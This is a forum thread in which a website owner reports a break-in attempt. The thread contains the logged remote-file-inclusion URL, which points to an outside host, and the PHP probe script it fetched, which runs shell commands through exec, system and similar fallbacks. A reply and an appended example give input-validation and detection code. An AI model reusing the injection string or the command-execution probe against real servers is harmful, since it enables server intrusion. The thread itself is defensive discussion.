Being Hacked

Posted: Sun Jul 12, 2009 12:29 pm
by lupole
Hello all.

I got hacked last night from Korea Republic IP 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Landing page should be this:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de

without the following:

///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

When I point my browser to:

samjinenginc.com/board/readme.txt???

the script below shows. After this, the next stats entry does not show, only this error, blocking the IP and country addresses:

Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549

After this entry, all other entries are normal.

Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?

This also blocked my other tracking scripts.

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

Thanks

Re: Being Hacked

Posted: Sun Jul 12, 2009 12:55 pm
by matthijs
In your script, how is

?language=de
being used?

If you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.
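
One way to apply the validation described in the reply above to the `language` parameter, and to refuse query strings shaped like the logged request, is sketched here. This is an added example, not code from the thread or from the shop software; `ALLOWED_LANGUAGES`, `clean_language()` and `is_suspicious_query()` are assumed names, and the sample host is a placeholder.

```php
<?php
// Added example: allow-list validation for ?language= plus a guard that
// refuses query strings naming PHP superglobals or carrying a URL value.
// ALLOWED_LANGUAGES and both function names are assumptions for illustration.

const ALLOWED_LANGUAGES = ['en', 'de', 'es'];

/** Return a language code from the allow-list, or the default. */
function clean_language($raw, string $default = 'en'): string
{
    if (!is_string($raw)) {          // ?language[]=x arrives as an array
        return $default;
    }
    // Strict comparison: anything not exactly on the list is discarded.
    return in_array($raw, ALLOWED_LANGUAGES, true) ? $raw : $default;
}

/** True when a raw query string names a superglobal or passes a remote URL. */
function is_suspicious_query(string $query): bool
{
    $decoded = rawurldecode($query);
    // Parameter names such as _SERVER[...], _GET[...], GLOBALS[...]
    $names = '/(^|[?&\/])(_(SERVER|GET|POST|COOKIE|FILES|ENV|REQUEST|SESSION)|GLOBALS)\s*(\[|=)/i';
    if (preg_match($names, $decoded)) {
        return true;
    }
    // Values that are remote URLs, the shape of a remote-include attempt
    return (bool) preg_match('#=\s*(https?|ftp)://#i', $decoded);
}

// Constructed sample inputs modelled on the two URLs in the first post.
$samples = [
    'language=de',
    'language=de///?_SERVER[DOCUMENT_ROOT]=http://attacker.example/readme.txt???',
];

foreach ($samples as $query) {
    parse_str($query, $params);
    $lang = clean_language($params['language'] ?? null);
    $flag = is_suspicious_query($query) ? 'REJECT (403)' : 'ok';
    printf("%-80s language=%s  %s\n", $query, $lang, $flag);
}
```

The URL-value check also matches legitimate parameters that carry URLs, so apply it only to scripts that never expect one. The allow-list is the primary control; the query guard is an extra layer that gives the tracker a clean rejection to log.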